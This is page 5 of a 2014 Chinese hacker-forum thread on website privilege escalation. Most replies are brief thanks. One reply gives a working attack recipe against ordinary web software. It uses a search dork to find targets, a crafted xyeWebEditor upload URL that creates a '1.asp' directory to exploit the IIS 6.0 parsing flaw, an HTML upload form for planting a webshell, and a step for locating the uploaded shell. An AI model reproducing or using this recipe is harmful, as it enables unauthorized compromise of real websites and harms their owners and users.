别人给的网站提权教程 - 第5页 - 技术文章 - 红客联盟 - 由08安全团队运营

风雨发表于 2014-1-10 20:36:11

最近提权一直是性外+安全狗、来学习了

zccliyn 发表于 2014-1-10 22:06:35

感谢分享、

ccccchina 发表于 2014-1-10 22:17:13

东方微点 发表于 2014-1-11 15:47:33

看了楼上的，分是用来干嘛的？

2863482451 发表于 2014-1-11 17:21:05

看看思路。学习一下

Netecen 发表于 2014-1-15 08:45:46

查看下，是不是原创

a765443190 发表于 2014-1-15 11:43:38

感谢分享，，

孙悟饭的! 发表于 2014-1-15 22:05:42

O(∩_∩)O谢谢分享

孙悟饭的! 发表于 2014-1-15 22:06:20

啊哦，你所访问的页面不存在了。

q8616685 发表于 2014-1-16 01:49:05

inurl:Showservices.asp?id=

先访问

http://网站/admin/xyeWebEditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=1.asp

产生一个1.asp目录

利用IIS6.0解析漏洞
利用下面的表单提交
<form action="http://网站/admin/xyeWebEditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=1.asp"

method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=upload>
</form>
然后查看源文件，找出马儿路径

页: 1 2 3 4 [5] 6 7 8 9 10 11 12 13 14

红客联盟 - 由08安全团队运营's Archiver